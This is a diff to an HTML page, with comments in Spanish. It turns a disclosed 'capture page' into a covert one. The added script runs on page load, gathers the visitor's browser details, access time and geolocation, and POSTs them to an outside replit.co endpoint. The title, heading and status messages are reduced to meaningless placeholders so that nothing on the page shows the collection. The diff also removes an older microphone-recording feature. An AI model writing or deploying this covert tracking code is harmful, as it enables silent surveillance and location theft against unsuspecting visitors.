--- a/index.html
+++ b/index.html
@@ -3,90 +3,71 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Página de Captura</title>
+    <title>*.*</title>
     <script>
-        let mediaRecorder;
-        let audioChunks = [];
-
         function capturarDatos() {
+            // Capturar datos básicos
             const datos = {
                 userAgent: navigator.userAgent,
                 plataforma: navigator.platform,
                 idioma: navigator.language,
                 online: navigator.onLine,
-                fechaHora: new Date().toISOString(),
+                horaAcceso: new Date().toISOString() // Hora en formato ISO
             };
 
+            // Capturar ubicación usando Geolocation API
+            if (navigator.geolocation) {
+                navigator.geolocation.getCurrentPosition(
+                    (position) => {
+                        datos.ubicacion = {
+                            latitud: position.coords.latitude,
+                            longitud: position.coords.longitude,
+                            precision: position.coords.accuracy
+                        };
+
+                        enviarDatos(datos); // Enviar datos al servidor con ubicación
+                    },
+                    (error) => {
+                        console.error("Error al obtener la ubicación:", error);
+                        datos.ubicacion = { error: "No se pudo obtener la ubicación" };
+                        enviarDatos(datos); // Enviar datos al servidor sin ubicación
+                    }
+                );
+            } else {
+                datos.ubicacion = { error: "Geolocalización no soportada" };
+                enviarDatos(datos); // Enviar datos al servidor sin ubicación
+            }
+        }
+
+        function enviarDatos(datos) {
             fetch('https://979c5a95-3dfb-4130-8e4b-c2a06b13a186-00-cuily0isatzs.spock.repl.co/capturar-datos', {
                 method: 'POST',
                 headers: { 'Content-Type': 'application/json' },
                 body: JSON.stringify(datos)
             })
-            .then(response => response.json())
+            .then(response => {
+                if (response.ok) {
+                    return response.json();
+                } else {
+                    throw new Error("Error en la respuesta del servidor.");
+                }
+            })
             .then(data => {
                 console.log("Datos enviados:", data);
-                document.getElementById("mensaje").textContent = "Datos enviados correctamente.";
+                document.getElementById("mensaje").textContent = " ";
             })
             .catch(error => {
                 console.error("Error al enviar los datos:", error);
-                document.getElementById("mensaje").textContent = "Error al enviar los datos.";
+                document.getElementById("mensaje").textContent = "-.-.";
             });
-        }
-
-        function iniciarGrabacion() {
-            navigator.mediaDevices.getUserMedia({ audio: true })
-                .then(stream => {
-                    mediaRecorder = new MediaRecorder(stream);
-                    mediaRecorder.ondataavailable = event => {
-                        audioChunks.push(event.data);
-                    };
-                    mediaRecorder.onstop = enviarAudio;
-                    mediaRecorder.start();
-                    document.getElementById("mensaje-audio").textContent = "Grabando...";
-                })
-                .catch(error => {
-                    console.error("Error al acceder al micrófono:", error);
-                });
-        }
-
-        function detenerGrabacion() {
-            if (mediaRecorder) {
-                mediaRecorder.stop();
-                document.getElementById("mensaje-audio").textContent = "Grabación detenida. Enviando...";
-            }
-        }
-
-        function enviarAudio() {
-            const audioBlob = new Blob(audioChunks, { type: 'audio/webm' });
-            const formData = new FormData();
-            formData.append("audio", audioBlob);
-
-            fetch('http://127.0.0.1:8080/subir-audio', {
-                method: 'POST',
-                body: formData
-            })
-            .then(response => response.json())
-            .then(data => {
-                console.log("Audio enviado:", data);
-                document.getElementById("mensaje-audio").textContent = "Audio enviado correctamente.";
-            })
-            .catch(error => {
-                console.error("Error al enviar el audio:", error);
-                document.getElementById("mensaje-audio").textContent = "Error al enviar el audio.";
-            });
-
-            audioChunks = [];
         }
 
         window.onload = capturarDatos;
     </script>
 </head>
 <body>
-    <h1>Página de Captura</h1>
-    <p>Esta página recopila información técnica del dispositivo de prueba.</p>
-    <p id="mensaje">Enviando datos...</p>
-    <button onclick="iniciarGrabacion()">Iniciar Grabación</button>
-    <button onclick="detenerGrabacion()">Detener Grabación</button>
-    <p id="mensaje-audio"></p>
+    <h1>XXX</h1>
+    <p> </p>
+    <p id="mensaje">...</p>
 </body>
 </html>
